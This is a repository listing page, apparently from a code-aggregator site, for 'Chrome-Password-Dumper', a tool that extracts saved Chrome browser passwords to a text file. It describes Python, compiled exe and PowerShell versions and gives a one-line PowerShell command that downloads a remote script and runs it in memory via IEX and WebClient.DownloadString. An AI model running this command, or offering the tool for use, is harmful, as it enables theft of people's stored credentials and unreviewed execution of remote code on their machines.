• Stars
    star
    143
  • Rank 257,007 (Top 6 %)
  • Language
    PowerShell
  • Created over 5 years ago
  • Updated over 5 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Chrome-Password-Dumper

For Windows version simply run chrome.exe to dump the passwords to a text file.

For powershell version:

IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/roflsandwich/Chrome-Password-Dumper/master/chromev2.ps1')

Chrome must be closed before running the PoC

  • chrome.py uncompiled version

  • chrome.exe - compiled with py2exe

  • chrome.ps1 - powershell version

  • chromev2.ps1 - powershell version with a process check for chrome.